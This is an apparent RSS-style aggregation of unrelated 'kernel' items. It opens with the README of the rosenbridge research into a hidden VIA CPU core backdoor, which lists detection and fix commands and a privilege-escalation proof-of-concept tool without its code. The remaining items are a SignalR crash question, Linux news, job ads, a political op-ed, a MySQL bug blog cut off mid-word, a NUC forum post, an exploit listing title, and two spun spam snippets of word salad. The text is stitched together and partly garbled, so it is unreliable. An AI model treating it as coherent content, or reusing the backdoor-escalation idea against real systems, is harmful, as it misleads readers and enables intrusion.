This work is released as a case study and thought experiment, illustrating how backdoors might arise in increasingly complex processors, and how researchers and end-users might identify such features. The tools and research offered here provide the starting point for ever-deeper processor vulnerability research.

Checking your CPU

To check if your CPU is affected:

git clone https://github.com/xoreaxeaxeax/rosenbridge
cd rosenbridge/util
make
sudo modprobe msr
sudo ./bin/check

The provided utility must be run on baremetal (not in a virtual-machine), and is in an alpha state. It may crash, panic, or hang systems not containing the backdoor.

The utilities provided here are designed around a specific processor family and core; unfortunately, the tools will miss the backdoor if it has been even slightly modified from the researched form.

Closing the Backdoor

Some systems have the backdoor enabled by default, allowing unprivileged code to gain kernel level access without permission. If the steps in 'Checking your CPU' indicate that your CPU is vulnerable, you can install a script to close the backdoor early in the boot process:

cd fix
make
sudo make install
reboot

Note that, even with this, an attacker with kernel level access can still re-enable the backdoor. This script is provided as an outline for correcting the issue during the boot process, but will require adaptation for different systems.

Tools and Techniques

The sandsifter utility is used extensively in this research for uncovering unknown instructions.

asm

An assembler for the Deeply Embedded Instruction Set (DEIS). It converts programs written in the custom rosenbridge assembly into x86 instructions, which, when executed following the launch-instruction, will send the commands to the hidden CPU core.

esc

A proof-of-concept of using the rosenbridge backdoor for privilege escalation.

fix

A rough outline for closing the vulnerability on affected systems, to the extent possible through model-specific-register updates.

fuzz

A collection of utilities used to fuzz both the x86 and rosenbridge cores, in order to isolate the unknown launch-instruction and bridge-instruction, and resolve the instruction format of the rosenbridge core.

deis

The fuzzer used to explore the effects and capabilities of the hidden CPU core.

exit

It is thought that, on some processors, an exit sequence is needed to switch back to the x86 core at the end of a DEIS sequence. This directory contains the utilities used to search for the exit sequence in the early stages of the research; the search was abandoned when a processor was found that did not require any such sequence.

manager

A collection of python utilities designed to monitor and manage fuzzing tasks distributed across a network of workers.

wrap

A stripped down version of the sandsifter fuzzer, used to identify the bridge-instruction that will send commands from the x86 core to the hidden rosenbridge core.

kern

A collection of helper utilities used to monitor kernel memory and registers for changes caused by fuzzed DEIS instructions.

lock

Utilities to lock or unlock the rosenbridge backdoor.

proc

A tool to identify patterns from the fuzzing logs to identify classes of DEIS instruction behaviors.

test

A tool used early in the research, to attempt to identify the hidden core's architecture by executing known RISC instructions.

util

An alpha-state tool to detect whether or not a processor is affected by rosenbridge.

References

(TODO: link to whitepaper)

(TODO: link to slides)

Disclaimer

The details and implications presented in this work are the authors’ inferences and opinions, derived from the research described. The research is performed and provided with the goal of identifying and fixing a perceived security vulnerability on the described CPUs. VIA processors are renowned for their low power usage and excellence in embedded designs; we believe that the functionality described was created in good faith as a useful feature for the embedded market, and was unintentionally left enabled on some early generations of the processor. No malicious intent is implied.

Author

project:rosenbridge is a research effort from Christopher Domas (@xoreaxeaxeax).


          Throw Exception in my Self-Host program

Hello, I have a corporate chat service that is currently running for employees and customers.

The number of connections in the last months has multiplied by 5x. The application is steadily following. But yesterday burst the following error below:

NOTE: There were 400 connections at the time of the error

Can you help me? =)

My self-host program:

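using System;
using System.Configuration;
using Autofac;
using Microsoft.AspNet.SignalR;
using Microsoft.Owin.Cors;
using Microsoft.Owin.Hosting;
using Owin;

// AutofacConfig, IChatProviderService and AppHub are project types not shown in the post.
namespace BQChat.Application.SelfHost
{
    class Program
    {
        static void Main(string[] args)
        {
            // The listener URL is read from the "HostDirect" appSetting.
            string url = ConfigurationManager.AppSettings["HostDirect"];

            // Starts the OWIN self-host; the stack trace below is raised from this call.
            using (WebApp.Start(url))
            {
                Console.WriteLine("Direct Server running on {0}", url);
                Console.ReadLine();
            }
        }
    }

    class Startup
    {
        public void Configuration(IAppBuilder app)
        {
            // Accepts cross-origin requests from any origin.
            app.UseCors(CorsOptions.AllowAll);

            var chatProviderService = AutofacConfig.Container.Resolve<IChatProviderService>();
            GlobalHost.DependencyResolver.Register(typeof(AppHub), () => new AppHub(chatProviderService));
            GlobalHost.Configuration.DefaultMessageBufferSize = 850;

            app.Map("/signalr", map =>
            {
                map.UseCors(CorsOptions.AllowAll);
                var hubConfiguration = new HubConfiguration()
                {
                    // Sends exception details from hub methods back to clients.
                    EnableDetailedErrors = true,
                    // Enables the JSONP fallback for cross-domain clients.
                    EnableJSONP = true
                };
                map.RunSignalR(hubConfiguration);
            });
        }
    }
}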

Error

15:08:25

Nome do aplicativo com falha: BQChat.Application.SelfHost.exe, versão: 1.0.0.0, carimbo de data/hora: 0x5b682a9f
Nome do módulo com falha: KERNELBASE.dll, versão: 6.3.9600.18264, carimbo de data/hora: 0x56e1b34d
Código de exceção: 0xe0434352
Deslocamento da falha: 0x00015b68
ID do processo com falha: 0x365c
Hora de início do aplicativo com falha: 0x01d4300bf6098fdc
Caminho do aplicativo com falha: C:\BQChat\host\BQChat.Application.SelfHost.exe
Caminho do módulo com falha: C:\Windows\SYSTEM32\KERNELBASE.dll
ID do Relatório: 35490950-9bff-11e8-80d6-00505680a589
Nome completo do pacote com falha:
ID do aplicativo relativo ao pacote com falha:

15:08:24

Aplicativo: BQChat.Application.SelfHost.exe
Versão do Framework: v4.0.30319
Descrição: O processo foi terminado devido a uma exceção sem tratamento.
Informações da Exceção: System.Net.HttpListenerException
em System.Net.HttpListener.AddAllPrefixes()
em System.Net.HttpListener.Start()
em Microsoft.Owin.Host.HttpListener.OwinHttpListener.Start(System.Net.HttpListener, System.Func2<System.Collections.Generic.IDictionary2<System.String,System.Object>,System.Threading.Tasks.Task>, System.Collections.Generic.IList1<System.Collections.Generic.IDictionary2<System.String,System.Object>>, System.Collections.Generic.IDictionary2<System.String,System.Object>, System.Func2<System.String,System.Func6<System.Diagnostics.TraceEventType,Int32,System.Object,System.Exception,System.Func3<System.Object,System.Exception,System.String>,Boolean>>)
em Microsoft.Owin.Host.HttpListener.OwinServerFactory.Create(System.Func2<System.Collections.Generic.IDictionary2<System.String,System.Object>,System.Threading.Tasks.Task>, System.Collections.Generic.IDictionary`2<System.String,System.Object>)

Informações da Exceção: System.Reflection.TargetInvocationException
em System.RuntimeMethodHandle.InvokeMethod(System.Object, System.Object[], System.Signature, Boolean)
em System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(System.Object, System.Object[], System.Object[])
em System.Reflection.RuntimeMethodInfo.Invoke(System.Object, System.Reflection.BindingFlags, System.Reflection.Binder, System.Object[], System.Globalization.CultureInfo)
em Microsoft.Owin.Hosting.ServerFactory.ServerFactoryAdapter.Create(Owin.IAppBuilder)
em Microsoft.Owin.Hosting.Engine.HostingEngine.StartServer(Microsoft.Owin.Hosting.Engine.StartContext)
em Microsoft.Owin.Hosting.Engine.HostingEngine.Start(Microsoft.Owin.Hosting.Engine.StartContext)
em Microsoft.Owin.Hosting.Starter.DirectHostingStarter.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.Starter.HostingStarter.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.StartImplementation(System.IServiceProvider, Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.Start(Microsoft.Owin.Hosting.StartOptions)
em Microsoft.Owin.Hosting.WebApp.Start(System.String)
em BQChat.Application.SelfHost.Program.Main(System.String[])


          Linux 4.19 Certainly Is Going To Be A Big Kernel
At the end of July I outlined some of the changes queued for Linux 4.19 while since then several more notable additions have become aligned for this next kernel cycle following the one week delay of Linux 4.18...
          Linux 4.19 Certainly Is Going To Be A Big Kernel
Phoronix: Linux 4.19 Certainly Is Going To Be A Big Kernel At the end of July I outlined some of the changes queued for Linux 4.19 while since...
          CBIC Clarification on GST Rates for various Goods and Services (dt. 10 Aug. 2018)
CBIC has issued a Clarification Circular dt. 10 Aug. 2018 in respect of applicable GST Rates for various Goods and Services, like Fortified Toned Milk, Refined beet and cane sugar, Tamarind Kernel Powder, Drinking water, Human Blood Plasma products, Wipes, Real Zari Kasab (Thread), Marine Engine, Quilt and comforter, Bus body building, Disc Brake Pad, etc.
          Tomato Plant Yellowing Leaves Put Yard Fertilizer When
Natural Sesame Seed, Hulled Sesame Seed, Black Sesame Seed, Black Sesame Seed, Black Sesame Seed, Edible & Industrial Salt, Masoor Dal , Wheat, Wheat Flour, Sugar, , Chilies, Groundnut Kernels, SPICES, and other herbs. They just that you are growing and wilting of leaf edges or leaf scorch. Home > FoxFarm Liquid Fertilizer – An […]
          Yes, the Press Helps Start Wars

Ted Galen Carpenter

Donald Trump has again stirred the wrath of his critics by charging that the media can cause wars. His opponents immediately howled that he’d launched another salvo in his ongoing campaign to vilify journalists as the “enemy of the people.” They also ridiculed his contention as factually absurd. Fox News reporter Chris Wallace bluntly asked National Security Advisor John Bolton: “What wars have we caused?” Princeton University historian and CNN analyst Julian E. Zelizer epitomized the view that Trump’s charge is unfounded with a piece in The Atlantic titled, “The Press Doesn’t Cause Wars—Presidents Do.”

Zelizer and similar critics are technically correct, of course. Media outlets have no power to launch attacks on foreign countries or order U.S. troops into combat. But that view is much too narrow. As Zelizer himself admits, the new media have considerable ability to influence public opinion. Such a capacity to shape the overall narrative is not a trivial power. An irresponsible press can, and has, whipped up public sentiment in favor of military actions that subsequent evidence indicated were unnecessary and even immoral.

Two cases stand out: the Spanish-American War and the Iraq War. Historians have long recognized that jingoistic “yellow journalism,” epitomized by the newspaper chains owned by William Randolph Hearst and Joseph Pulitzer, played a significant role in the former conflict. Months before the outbreak of the war, one of Hearst’s reporters wished to return home from Cuba because there was no sign of a worsening crisis. Hearst instructed him to stay, adding, “you furnish the pictures, and I’ll furnish the war.”

History shows that a jingoistic media can whip up support for hardline policies, as Trump rightly pointed out.

Hearst’s boast was hyperbolic, but the Hearst and Pulitzer papers did repeatedly hype the Spanish “threat” and beat the drums for war against Madrid. They featured stories that not only focused on but exaggerated the uglier features of Madrid’s treatment of its colonial subjects in Cuba. Those outlets also exploited the mysterious explosion that destroyed the U.S. battleship Maine in Havana’s harbor. To this day, the identity of the culprit is uncertain, but the yellow press exhibited no doubts whatever. According to their accounts, it was an outrageous attack on America by the villainous Spanish regime.

Such journalistic pressure was not the only factor that impelled William McKinley’s administration to push for a declaration of war against Spain or for Congress to approve that declaration. A rising generation of American imperialists wanted to emulate the European great powers and build a colonial empire. That underlying motive became evident when the first U.S. attack following the declaration of war came not in Cuba, but in the Philippines, Spain’s colony on the other side of the Pacific.

Nevertheless, it would be naïve to assume that the jingoist press did not play a significant role in causing the war against Spain. Indeed, the corrupt role of yellow journalism in creating public support for that conflict is not a particularly controversial proposition among historians.

The role of an irresponsible press in shaping a pro-war narrative was even more evident in the prelude to the 2003 U.S. military intervention in Iraq. New York Times reporter Judith Miller and other prominent mainstream journalists were especially culpable in publicizing erroneous information about Saddam Hussein’s government regarding two emotionally charged issues. They uncritically circulated “evidence” from Iraqi defectors and George W. Bush’s administration that Iraq was in league with al-Qaeda and may well have had a role in the devastating 9/11 terrorist attacks. And they pushed the case that Saddam had weapons of mass destruction and was actively working on developing a nuclear arsenal.

Again, it would be too much to place all or even most of the blame for the disastrous Iraq war on gullible or ultra-hawkish journalists. The Bush administration seemed determined to oust Saddam, and it might have attempted to do so even without strong public support. But most of the media was staunchly pro-war, and that bias greatly skewed the narrative presented to the public. When highly respected journalistic institutions like the New York Times circulated story after story highlighting the alleged security threat that Saddam posed, and those stories were then featured in other publications and on TV, it was hardly surprising that much of the public believed the narrative. The tendency of mainstream media outlets to ignore or marginalize war critics amplified their pro-war bias.

As is so often the case with Trump’s arguments, his accusation that the press can cause wars is an exaggeration, but one that contains an important kernel of truth. Irresponsible media coverage has undoubtedly strengthened public sentiment for ill-advised wars in the past, and it could do so again in the future. The sometimes shrill hostility of the mainstream media towards Russia is pushing the United States toward an increasingly hardline policy that now borders on a second cold war. The original Cold War nearly escalated to a hot one on several occasions. The press needs to be doubly cautious about pushing policies that would send America down a similar perilous path. Trump is wrong to brand the press as an enemy of the people, but it is still a powerful institution that has not always used its great influence responsibly regarding matters of war and peace.

Ted Galen Carpenter, a senior fellow in defense and foreign policy studies at the Cato Institute, is the author of 10 books on international affairs, including The Captive Press: Foreign Policy Crises and the First Amendment.
          Systems Engineer - Solera - Needham, MA
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT - View all Needham, MA jobs
          from 16.04 to 18.04 - Lost Wifi
Hello Ubuntu fans. I have read in another thread to follow these steps Code: --------- sudo apt remove bcmwl-kernel-source && sudo apt install git dkms git clone -b extended https://github.com/lwfinger/rtlwifi_new.git sudo dkms add ./rtlwifi_new
          Offer - NGO Reviews - Shandong
Search for Filipino recipes that can accommodate colourful ingredients comparable to peas, bell peppers and corn kernels. You may even add a little bit of meals coloration if the recipe amaretti biscuits permits. Famous Filipino Meals Recipes to Pattern at Lutong Bahay Website. In the event that they know they're serving to put the meals collectively, they will be extra open to your ideas.
          On InnoDB Data Compression in MySQL

Another story that I prepared back in April for my meeting with one of the customers in London was a "compression story". We spent a lot of time on it in several support issues in the past, with only limited success.

In the case of InnoDB tables, there are actually two ways to compress data (besides relying on filesystem compression or compressing individual columns on the server or application side). Historically, the first one was introduced by the Barracuda InnoDB file format and the ROW_FORMAT=COMPRESSED it supported. A notable number of related bugs were reported over time, and it may not be that easy to identify them all (you can find the current list of bugs tagged with "compression" here). I've picked the following bugs for my "story":

Bug #88220 - "compressing and uncompressing InnoDB tables seems to be inconsistent". Over the years Simon Mudd, Monty Solomon (see related Bug #70534 - "Removing table compression leaves compressed keys") and other community members reported several bugs related to inconsistencies and surprises with the key_block_size option. It is used for both MyISAM and InnoDB storage engines (for compressed tables) and it seems nobody is going to fix the remaining problems until they are gone with the MyISAM engine.

Bug #69588 - "MyISAM to InnoDB compressed slower than MyISAM to InnoDB, Then InnoDB to Compressed". Just a detail to take into account, noted 5 years ago by Joffrey MICHAIE, verified almost 4 years ago and then getting zero public attention from Oracle engineers.

Bug #62431 - "What is needed to make innodb compression work for 32KB pages?". Nothing can be done according to the manual:

"In particular, ROW_FORMAT=COMPRESSED in the Barracuda file format assumes that the page size is at most 16KB and uses 14-bit pointers."

Bug #78827 - "Speedup replication of compressed tables". Come on, Daniël van Eeden, nobody cares that

"Replication and InnoDB compressed tables are not efficiently working together."

The bug is still "Open".

Bug #75110 - "Massive, to-be-compressed not committed InnoDB table is total database downtime". This problem was reported by Jouni Järvinen back in 2014. Surely this is not a bug, but it seems nobody even tried to speed up compression in any way on multiple cores.

Bug #84439 - "Table of row size of ~800 bytes does not compress with KEY_BLOCK_SIZE=1". It was reported by Jean-Francois Gagne, who asked for a reasonable error message at least. Nothing happens after verification.

Bug #77089 - "Misleading innochecksum error for compressed tables with key_block_size=16". This problem was reported by Laurynas Biveinis more than three years ago, immediately verified and then got zero attention.
The boats above do not use the space for mooring efficiently. They need better compression.

Transparent Page Compression for InnoDB tables was added later and looked promising. If you are lucky enough to use a filesystem with sparse file and hole punching support and a proper OS or kernel version, then you could expect notable savings of disk space with very few additional keystrokes (like COMPRESSION="zlib") when defining the table. Different compression libraries were supported. Moreover (see here), only uncompressed pages are stored in memory in this case, and this improved the efficiency of buffer pool usage. It sounded promising originally, but there are still bugs to consider:

Bug #78277 - "InnoDB deadlock, thread stuck on kernel calls from transparent page compression". This bug alone (reported by Mark Callaghan back in 2015) may be a reason to NOT use the feature in production, as soon as you hit it (chances are high). There are many interesting comments that there are environments where the feature works as fast as expected, but I think this summary is good enough for most users:

"[19 Oct 2015 15:56] Mark Callaghan

...

Slow on XFS, slow on ext4, btrfs core team tells me it will be slow there. But we can celebrate that it isn't slow on NVMFS - closed source, not GA, can't even find out where to buy it, not aware of anyone running it."

The bug is still "Open".

Bug #81145 - "Sparse file and punch hole compression not working on windows". Not that I care about Windows that much, but still. The bug is "Verified" for 2 years.

Bug #87723 - "mysqlbackup cannot work with mysql5.7 using innodb page-level compression". Now this is awesome! Oracle's own MySQL Enterprise Backup does NOT support the feature. Clearly they cared about making it useful...
As a side note, the same problem affects Percona's xtrabackup (see PXB-1394). MariaDB resolved the problem (and several related ones like MDEV-13023) with the mariabackup tool.

Bug #87603 - "compression/tablespace ignored in create/alter table when not using InnoDB". COMPRESSION='.../' option is supported for MyISAM tables as well, and this again leads to problems when switching to another storage engine, as Tomislav Plavcic noted.

Bug #78672 - "assert fails in fil_io during linkbench with transparent innodb compression". This crash (assertion failure) was noted by Mark Callaghan back in 2015. May not crash anymore s
          NUC7i5BNH CPU package C-States/SpeedShift - UEFI Legacy boot issues

Hi all,

I got a NUC7i5BNH a couple of months ago which does not work as expected, I'll try to make it clear to understand and reproduce.

My previous NUC was a Skylake one, so starting with the new Kaby Lake unit I soon noticed it couldn't reach CPU package C-States lower than C2 in Windows 10 when CPU is idle and the display is powered on:

this produces higher temperatures, higher power consumption and higher noise than expected (and necessary), so I started investigating from BIOS configuration.

After some testing, and with my great surprise, I found that "Legacy boot" option disabled was the culprit for this behaviour.

 

Premises:

 

- Unit is NUC7i5BNH equipped with 2x16GB RAM Crucial CT2K16G4SFD8213 and M.2 2280 AHCI SSD Crucial CT500MX200SSD4 MX200

- Operating system used for testing is always an UEFI clean install of Windows 10 x64 1803 up to date (latest build 17134.12) with no crap/trash, just a clean system for testing purpose

- Drivers are up to date as per NUC7i5BNH Intel support page

- UEFI firmware is up to date (BNKBL357.86A Version 0065 6/6/2018)

- BIOS was always flashed via jumper recovery (F9 default settings loaded after power off and power cord unplug)

- NUC is connected to a DELL display via HDMI port or to a Samsung Smart TV via HDMI port (both display are full HD resolution 1920x1080), with same results

- Monitoring software used is HWInfo via its sensors interface

 

Better issue description:

 

BIOS default settings enable both "UEFI boot" and "Legacy boot":

with this configuration, when CPU is idle C-States work as expected and CPU can reach package C8 with the display active, using both "Balanced"* and "Power Saver" Windows 10 plans (* to get C8 with "Balanced" powerplan may be necessary  to enable AHCI Link power management (via Windows registry) and changing the value in power settings gui to "HIPM+DIPM" or "Lowest").

When display goes off due to power saving timer, CPU can reach lower C-States (C9 and C10)

This is the expected (per Intel docs) behaviour, so power consumption, heat and temperatures get benefits when there is no load.

 

If  "Legacy boot" option is disabled, when CPU is idle can reach only package C2 state if the display is active.

When display goes off due to power saving timer, CPU can now reach package C8 and lower (do note that if you just unplug HDMI cable or manually power off the display via power button, CPU still remains in C2).

This is not the expected behaviour, because system cannot get advantage of its lovely built-in power saving features.

 

I am an IT-Pro guy and a passionate user, so I tried to find a solution by myself but no luck:

- I tried changing any related or unrelated bios setting in every crazy combination possible without any effect, you need "Legacy boot" enabled

- I tried any available graphics driver for this unit and also the generic non-NUC one from the Iris Plus 640 page (newest tried was Version: 24.20.100.6136), no difference

- I tried tuning every Windows power setting - also advanced hidden ones - in every power plan, but no difference

- I tried also (just for fun) loading Windows 10 from USB drive with no other drive connected to the unit, no difference

 

Do note the same thing happened on the previous BIOS versions I went through before the last revision (0062, 0063, 0064), so downgrading to those revisions is useless.

Do also note that any recent Linux distribution I tried (Kernel from 4.15 up to 4.17) do not suffer this problem:

also without loading firmware blobs on boot, CPU can reach lower package C-States - as Intel Powertop reports - just as expected also when  "Legacy boot" option is disabled in BIOS and the display is active (may be necessary tuning some options to enable all power saving features, but it is expected and works fine).

Paradox here is Windows 10 is the only supported operating system by Intel for this NUC and - as per following Intel recommendations - should be installed only in UEFI mode to avoid issues.

Supported Operating Systems for Intel® NUC Products - "UEFI Boot is required to install Windows 10 - this is set by default in BIOS Setup. Using Legacy Boot results in multiple errors in Device Manager."

 

Some thoughts:

 

I think it is clearly a bug, it shows itself only in Windows 10 but I do not think Windows 10 is the culprit itself:

as reported, leaving "Legacy boot" option enabled everything works as expected, so I suppose this problem is bios related but obviously I can be wrong (as I never thought that such option could have such impact on power saving features).

UEFI and legacy boot initialize hardware in different ways and some of the features involved in power saving options are based on firmware blobs, anyway this is out of my control and I just don't have any other idea on how to try fixing it, so I hope someone can "pass the ball" to the right team and investigate about this issue, which could be present on other Kaby Lake NUCs as well.

To me and - I suppose - to the largest part of owners and/or potential owners - leaving "Legacy boot" option enabled is not an actual solution nor an option because:

- it prevents booting via UEFI PXE and micro sd slot (due to PCIe interface)

- it prevents (or may prevent) booting from NVME PCIe SSD, and if you disable it you'll lose idle power saving features

- if "secure boot" is needed and so enabled, "Legacy boot" is consequently disabled and you'll lose idle power saving features

- power saving features like CPU Package C-States and Speed Shift are really important arguments of choice when buying these units and should work as expected at least in the only OS supported by Intel

 

Steps to reproduce:

 

To get Idle C-States NOT working with display active:

- In VisualBIOS, load BIOS default settings with F9 and disable "Legacy boot", save with F10 and confirm.

- Boot Windows 10 and monitor CPU C-States with HWInfo (or any other similar software): C2 will be maximum package C-State reached in idle  with every power plan when the display is active.

 

To get Idle C-States working with display active (the expected behaviour):

- In VisualBIOS, load BIOS default settings with F9, save with F10 and confirm.

- Boot Windows 10, select "Power Saver" powerplan* and monitor CPU C-States with HWInfo (or any other similar software): C8 will be maximum package C-State reached in idle with the display active (C9 and C10 with display off via power saving timer).

* You can get C8 also with "Balanced" powerplan, but it may be necessary to enable AHCI Link power management (via Windows registry) and changing the value in power settings gui to "HIPM+DIPM" or "Lowest".

 

 

I hope it can be fixed, thanks in advance to everyone who can investigate about it.

 

Best regards to all the community,

M


          Telecommuting Senior Reverse Engineer
An IT consulting company needs applicants for an opening for a Telecommuting Senior Reverse Engineer. Must be able to: Tearing apart binaries, malware, kernels, firmware or anything else that needs breaking Helping bring cutting edge R&D projects to active use Completing any other duties as assigned Required Skills: Bachelor's degree in Computer Science, Computer Engineering, or related technical discipline 5 or more years of professional experience Fluent in two or more architectures and assembly programming (preferably x86/x64 and ARM) Extensive experience with disassemblers, decompilers, and debuggers (IDA, Hopper, Capstone, gdb, etc) Understanding of vulnerability research and exploit development Experience with a range of operating systems including Windows
          Asymmetric Kernel Smoothing Theory and Applications in Economics and Finance

Asymmetric Kernel Smoothing: Theory and Applications in Economics and Finance by Masayuki Hirukawa
English | PDF,EPUB | 2018 | 117 Pages | ISBN : 9811054657 | 4.46 MB
This is the first book to provide an accessible and comprehensive introduction to a newly developed smoothing technique using asymmetric kernel functions. Further, it discusses the statistical properties of estimators and test statistics using asymmetric kernels. The topics addressed include the bias-variance tradeoff, smoothing parameter choices, achieving rate improvements with bias reduction techniques, and estimation with weakly dependent data. Further, the large- and finite-sample properties of estimators and test statistics smoothed by asymmetric kernels are compared with those smoothed by symmetric kernels. Lastly, the book addresses the applications of asymmetric kernel estimation and testing to various forms of nonnegative economic and financial data.


          Software Engineer
OH-Cincinnati, seeking talented software engineers with two or more years of industry experience who are interested in opportunities to develop solutions to national security threats. Selected Software Engineering personnel will be expected to derive application requirements, perform design and development of cyber operations products, kernel mode solutions, and embedded software. Software personnel may also sup
          Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) Arbitrary File Read
Linux Kernel version 4.14.7 (Ubuntu 16.04 / CentOS 7) arbitrary file read exploit with KASLR and SMEP bypass. - Source: packetstormsecurity.com
          Systems Engineer - Solera - Needham, MA
Understanding of Linux internals, including kernel and tcp stack tuning. Support the Corporate infrastructure (Cisco, VMware, Active Directory) for internal...
From Solera - Thu, 17 May 2018 16:04:20 GMT
          A Distributed Classifier for MicroRNA Target Prediction with Validation Through TCGA Expression Data
Background: MicroRNAs (miRNAs) are approximately 22-nucleotide long regulatory RNA that mediate RNA interference by binding to cognate mRNA target regions. Here, we present a distributed kernel SVM-based binary classification scheme to predict miRNA targets. It captures the spatial profile of miRNA-mRNA interactions via smooth B-spline curves. This is accomplished separately for various input features, such as thermodynamic and sequence-based features. Further, we use a principled approach to uniformly model both canonical and non-canonical seed matches, using a novel seed enrichment metric. Finally, we verify our miRNA-mRNA pairings using an Elastic Net-based regression model on TCGA expression data for four cancer types to estimate the miRNAs that together regulate any given mRNA. Results: We present a suite of algorithms for miRNA target prediction, under the banner Avishkar, with superior prediction performance over the competition. Specifically, our final kernel SVM model, with an Apache Spark backend, achieves an average true positive rate (TPR) of more than 75 percent, when keeping the false positive rate of 20 percent, for non-canonical human miRNA target sites. This is an improvement of over 150 percent in the TPR for non-canonical sites, over the best-in-class algorithm. We are able to achieve such superior performance by representing the thermodynamic and sequence profiles of miRNA-mRNA interaction as curves, devising a novel seed enrichment metric, and learning an ensemble of miRNA family-specific kernel SVM classifiers. We provide an easy-to-use system for large-scale interactive analysis and prediction of miRNA targets. All operations in our system, namely candidate set generation, feature generation and transformation, training, prediction, and computing performance metrics are fully distributed and are scalable. 
Conclusions: We have developed an efficient SVM-based model for miRNA-target prediction using recent CLIP-seq data, demonstrating superior performance, evaluated using ROC curves for different species (human or mouse), or different target types (canonical or non-canonical). We analyzed the agreement between the target pairings using CLIP-seq data and using expression data from four cancer types. To the best of our knowledge, we provide the first distributed framework for miRNA target prediction based on Apache Hadoop and Spark. Availability: All source code and sample data are publicly available at https://bitbucket.org/cellsandmachines/avishkar. Our scalable implementation of kernel SVM using Apache Spark, which can be used to solve large-scale non-linear binary classification problems, is available at https://bitbucket.org/cellsandmachines/kernelsvmspark.
          Why Locking Down the Kernel Won’t Stall Linux Improvements

The Linux Foundation sponsored this post. The Linux Kernel Hardening Project is making significant strides in reducing vulnerabilities and increasing the effort required to exploit vulnerabilities that remain. Much of what has been implemented is obviously valuable, but sometimes the benefit is more subtle. In some cases, changes with clear merit face opposition because of performance […]

The post Why Locking Down the Kernel Won’t Stall Linux Improvements appeared first on The New Stack.


          OSS Leftovers
  • Open source Kaa IoT middleware to take on enterprise IoT

    To benefit from IoT, businesses need a way to network, manage and secure all of their connected devices. While there are proprietary IoT middleware platforms available to do this for the home and heavy industries like manufacturing, the Kaa IoT platform is one of the few open source options on the market today that is business-ready.

  • bzip.org changes hands

    The bzip2 compression algorithm has been slowly falling out of favor, but is still used heavily across the net. A search for "bzip2 source" returns bzip.org as the first three results. But it would seem that the owner of this domain has let it go, and it is now parked and running ads. So we no longer have an official home for bzip2.

  • Three Capabilities Banks Need to Work On While Adopting Open Source

    As banks are now willing to experiment and adopt new age technologies such as artificial intelligence and blockchain, the next big step of its digital disruption has to do with open source banking.

    With the adoption of open source, banks are likely to open their APIs and share customer data with third-party players to develop innovative products and offer customized real-time bespoke services to customers.

    Industry experts consider it to be the best time to embrace open banking as customer buying patterns are changing.

    In a previous interaction with Entrepreneur India, Rajeev Ahuja, Executive Director, RBL Bank attributed this change to “the emergence of nontraditional competition such as fintech startups, growing domination of technologies like blockchain, artificial intelligences, machine learning, etc and lastly, the initiatives taken by the Reserve Bank Of India to regulate the payments banks, peer to peer lending platforms, linking of Aadhar, and e-kyc.”

  • Free and open-source software con returns to International House

    FOSSCon, a free and open-source software conference, will be held Aug. 25 at the International House Philadelphia. Lectures and workshops will teach participants about free software and new ways to use it.

    Unlike most software, which is only available under restrictive licensing, free and open-source software is available under licenses that let people distribute, run and modify the software for their own purposes. It includes well-known projects like the Firefox browser or the Linux kernel. Those who talk about “free software” emphasize the way copyright law restricts users’ freedom, while those who talk about “open source” emphasize the economic and technical benefits of shared development.

    However, most of the scheduled events are far from philosophical, focusing on technical subjects like the use of domain name systems or the filesystem ZFS. The speakers range from professional programmers to enthusiasts. Most famous on the list is Eric S. Raymond, one of the thinkers behind “open source,” who will speak about the history of the C programming language and what might replace it. Of particular local interest is a talk by Eric O’Callaghan, a systems administrator at Thomas Jefferson University, on how to use public data from Indego Bike Share.


          today's howtos

          Hug-Loving Great Dane Trains to Become Service Dog

Everyone has heard the stories of big dogs that think they are lap dogs. Kernel the Great Dane, however, takes that to a whole new level. The massive pooch loves to sit in the lap of his owner, Alyssa, and snuggle up with other family members. One of his favorite ways to interact with his humans, though, is through hugs. Alyssa has Kernel give her a hug every morning and lets him jump up on his back paws so she does not have to bend down to reach him. Alyssa’s hugs are one of Kernel’s...

The post Hug-Loving Great Dane Trains to Become Service Dog appeared first on Inspiration Report.


          Linux Live Kernel Patching Is On The Way For 64-bit ARM
It has been a while since there were any advancements to report on the live kernel patching front, which allows deploying fixes (primarily Linux kernel security fixes) without having to reboot the system. There is some new progress to report now: 64-bit ARM (ARM64/AArch64) support is getting squared away...
          openSUSE Tumbleweed Updates Linux Kernel 4.17.12, KDE Plasma 5.13.4, mesa 18.1.5, and More
openSUSE Tumbleweed released 5 snapshots this week (0803, 0804, 0806, 0807, 0808), updating Linux Kernel 4.17.12, LibreOffice 6.1.0 RC3, VirtualBox 5.2.16, FirewallD 0.6.0, KDE Plasma 5.13.4, mesa 18.1.5, and more.
          GNU/Linux on Laptops
  • Dell's Thunderbolt TB16 Dock Can Work With Linux & Drive Dual 4K Displays

    When it came to settling on the latest-generation Dell XPS 13 as my main production workhorse with Fedora Workstation 28, besides the laptop's own traits like its build quality, specs relative to price, and other factors, another important requirement was the ability to drive two 4K displays when at my desk. The Dell XPS 13 has no issue driving dual 4K screens via the Dell Thunderbolt TB16 dock.

  • Chrome OS update makes installing Linux apps easier
  • Chrome OS update simplifies installing Linux applications

    A recent Chrome OS update has made the installation of Linux applications as simple as most of the popular distributions.

    Chrome OS is based on the Linux kernel and it’s been possible to install applications designed for the latter for some time using tools like Crouton.

    However, installing Linux apps on Chrome OS has never been friendly to beginners and required users to be in developer mode and have some knowledge of the command line. A recent OS update has changed matters.

    [...]

    Linux distros have been around since the 90s and continue to build up a roster of desktop-optimised apps. For Chrome OS to ever be considered a serious work platform to rival Windows and Mac, it needed to embrace Linux apps.

  • 28 older Chromebooks now support Linux apps

    More Chromebooks from Acer, Asus, Dell, HP, Lenovo, and Samsung have received Linux app support. The change, which landed Thursday, will apply to some Chromebooks that were released in 2015-2017, running Intel Braswell architecture and Kernel 3.18.

  • Chrome OS now supports installing arbitrary Linux packages

